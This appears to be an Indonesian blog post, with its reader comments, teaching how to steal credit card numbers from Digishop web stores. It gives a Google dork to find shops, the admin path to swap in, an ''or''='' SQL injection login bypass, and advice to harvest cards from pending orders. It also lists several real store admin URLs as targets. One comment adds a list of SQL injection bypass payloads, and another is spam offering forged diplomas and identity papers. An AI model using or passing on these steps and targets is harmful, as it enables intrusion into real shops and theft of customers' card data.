Cari nomor Kartu Kredit dengan Bug Digishop


1–] Buka Google

2–] Ketik inurl:“/cart.php?m=” [atau kreasi lo sendiri]

3–] Pilih salah satu target misalnya :

http://uniquescrapbooks.com.au/store/cart.php?m=view.

hapus tulisan cart.php?m= dengan admin.
Jadinya http://uniquescrapbooks.com.au/store/admin
4–] Nanti akan muncul menu login.
Masukkan bug SQL Injection ini untuk Username dan Password
Pada Username dan Password, isi dengan ‘or”=”

_________________
Username :|_____’or”=”______|
_________________
Password :|_____’or”=”______|

5–] Klo berhasil, nanti akan muncul Main Menu dan silahkan cari CC nya. (udah sampe sini silahkan explorasi, jangan minta disuapin terus)
Liat yang pending orders karena CC nya masih ada, kalau di pending orders CC nya udah ga ada berarti lo udah keduluan orang, he…he…he…

6–] Klo yang muncul Invalid Username or Password, berarti SQL
Injection-nya udah ga mempan, he…he…he…silahkan cari
yang lain.

—==[ Tips : - Klo` Lo dapet yang Order-an nya masih sedikit, targetnya di simpen aja dulu, mungkin beberapa hari kemudian udah ada CC baru (alias ada yg shopping)
- Klo` dapet target bagus, jangan lupa bagi-bagi
ya, he...he...he...

GOOD LUCK !

---==[ Contoh Target ]==—

http://www.7footserb.com/shop/admin/

https://www.tangerineclothing.com/admin/

https://www.flagsbygm.com/store/admin/

https://www.facesbyfelicia.com/store/admin/

http://creativecaketoppers.com/admin/

Itu sengaja gw kasih contoh target yang emang jelek.
kow jelek…? cuma buat buktiin klo tutorial ini bukan
cuma FU-CK-I-NG A-S-S HOLE of a theory

dan bikin lo penasaran dan terpancing untuk mencoba
sendiri (untuk belajar ya…bukan untuk merusak :D)

this article took from http://www.hitam-putih.com
original write by : IbnuSina (dia tau darimana dagh)
and modified by : th3sn0wbr4in to make it easier
repeat posting by : ricisan

About these ads
This entry was posted in Uncategorized. Bookmark the permalink.

46 thoughts on “Cari nomor Kartu Kredit dengan Bug Digishop

  1. bos…d aku coba…kok g bisa?!?!?!
    “contoh target”pun aku coba…g bisa juga
    Mohon petunjuknya….

    tanks bos…

  2. ga bisa boss udah d coba. ajarin cara yg lain donk

  3. terimakasih lebih dari sekedar pantas untuk di coba!

  4. ajarin trik yang lain donk_

  5. kalo mua ngasih pelajaran yang jelas dong
    jangan setengan2 :D sebenarnya lo bisa ga

  6. hole ID ama password yg terbaru,yg bisa dipakai skarang apa kak

  7. Woy..
    tolongin gw dong,,
    gw bingungnya bug Injection ituh

  8. sepertinyacara itu sudah tak mujarab banyak yang ngelu ndak berhasil

    :P

  9. boss bisa kirimkan cara yang terbaru gak versi 2007

    karna versi yang ‘or”=” <== gk isa di pake lagi

    makasih sebelum nya

    kirim ke email saia aja boss

  10. gue emang salut . . . . . .. .
    kasi tau yang lain dong . .. ?

  11. weleh . . . . . . kok hebat yah, , ,

  12. aku berhasil…… tp aku coba pas jualan perlatan kecantikan…hmmm sayang.. coba lagi dah gak bisa….besok lagi ah…

  13. amayudiawan kasih tau gw donk caranya… klo berhasil gw transfer uang ke account lw… gw janji… lewat e-mail aja y…..

  14. btw amayudaiawan…. lw akses ke sitius apa????

  15. oi.. kq paswd n loginnya kaga fungsi c??? apaan lagi nih triknya???

  16. apa bisa pasword n loginnya pake pasword hacking tools???

  17. gak bisa digunain,,,,, its just fuck

  18. gimana sich ngehack in kartu kredit

  19. krimin donk cara yang jelas ke email qu

  20. halo.. para Big Boss aku cuma mau knalan sama rekan-rekan aja,,,?!
    thx. No. Aku 081510082074

  21. setan loe, loe penipu

  22. ♥♦♣♠===[AWAN SANG PEMBERONTAK]===♠♣♦♥

    =======================================
    =)) =))
    =)) =))

    =====[FU-CK-I-NG A-S-S HOLE of a theory]=====

  23. dah basi banget ampe di lalerin tuch…

  24. Bosssss….
    ga bisa aku…tlng dunk kasih petujuk yg sejelas2nya ke e-mail aku ya mbah dukun…hehehehe….Aku tunggu lho..

  25. ngk mempan tuhc,klu bisa yang lebih creatif dikit dong

  26. bos, bagaiman nich? ara yang bos ajarkan belum berhasil nich? ajari lebih lanjut dong…

  27. Di bawah ini bisa dimasukkan baik ke user name maupun password :
    ‘ or 0=0 –
    ” or 0=0 –
    or 0=0 –
    ‘ or 0=0 #
    ” or 0=0 #
    or 0=0 #
    ‘ or ‘x’=’x
    ” or “x”=”x
    ‘) or (’x’=’x
    ‘ or 1=1–
    ” or 1=1–
    or 1=1–
    ‘ or a=a–
    ” or “a”=”a
    ‘) or (’a’=’a
    “) or (”a”=”a
    hi” or “a”=”a
    hi” or 1=1 –
    hi’ or 1=1 –
    hi’ or ‘a’=’a
    hi’) or (’a’=’a
    hi”) or (”a”=”a

  28. hi!
    bug for what version?
    i am test but don’t good?

    if who test good pm for me know!

    thanks!

  29. lha itu tutor dah lama bozz
    secara pada era 90an masih isa jalan
    klo gag salah saiia pake pada taon 1996
    dan pada taon 2000 an udah gag isa jalan
    secara admin udah pinter kaleee
    tp …
    Banyak Jalan Menuju Ke Neraka

    dan

    DALAM DUNIA INTERNET TIDAK ADA 100% YANG AMAN

  30. weleh-weleh, ,

    itu cara waktu nabi adam masih pakai onta, ,

    udah lama banget tuh , ,

    mendingan di buat baru ja, ,

    ntar orang pada kecewa nyobainnya,

    kalau mo tau lebih lanjut klik ja

    http://www.rezkyjanuar@yahoo.com

  31. boss gmna donk akupingin bisa, hehehe

  32. ajarin dwonk mas????gw bayar deh bwt ilmunya…….

  33. Aldi n Nando..
    coba search aja di google mas, cara2 yang lain…

    karena cara yang diatas sudah lama sangat, dan tidak berlaku lagi…
    coba search yang terbarunya di google ya…
    terima kasih.,..

    salam hangat.

  34. ANDA BUTUH IJAZAH UNTUK MENCARI KERJA / MELANJUTKAN KULIAH / KENAIKAN JABATAN ?!?!
    KAMI JASA PEMBUATAN IJAZAH SIAP MEMBANTU ANDA UNTUK MEMENUHI KEBUTUHAN IJAZAH UNTUK BEKERJA ATAU MELANJUTKAN SEKOLAH / KULIAH.
    BERIKUT INI MERUPAKAN JASA YANG KAMI SEDIAKAN.

    -SMU:4.000.000
    -D3:6.000.000
    -S1:8.000.000

    * AMAN, LEGAL, TERDAFTAR DI UNIVERSITAS / KOPERTIS / DIKTI, BISA UNTUK MASUK(PNS, TNI, POLRI).

    JUGA MELAYANI PEMBUATAN SURAT SURAT PENTING SEPERTI:SIM, STNK, KTP, REKENING BANK, SURAT TANAH, AKTE KELAHIRAN.BPKB, N1, SURAT NIKAH, DLL.

    SYARAT:KTP/SIM,FOTO BERWARNA DAN HITAM PUTIH,UNIVERSITAS YANG DITUJU,IPK YANG DIMINTA(MAX 3,50),TAHUN KELULUSAN YANG DIMINTA,ALAMAT PENGIRIMAN YANG DIMINTA.KIRIM KE:arief_gagah@yahoo.com

    BERMINAT?

    HUB: +6285736927001.

    (HANYA UNTUK YANG SERIUS SAJA)

    Nb:Semua manusia berhak meiliki pekerjaan dan pendidikan yang layak,entah dari kalangan atas,menengah dan bawah.Maka dari itu kami ada untuk anda yang mebutuhkan ijazah atau surat-surat penting lainnya.

  35. GIMANA SI CARA MAU NYARI NO KARTU KREDIT

  36. copy apste dari orang lo,,
    buktinya kagak bisa tuh,,
    emang dodol lo

  37. gembel
    udah
    dicoba
    jga
    gak
    bisa
    dasar cara jadul…….

  38. tau cara daftar kartu debit di internet gg klo tau kirim pesan ke fb q name:Reza D Luffy

  39. bikin puyeng!!!
    kyag Lon*e

  40. palsu, banyak2 belajar brooooo…

Silahkan Tinggalkan Komentar Anda... :)

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s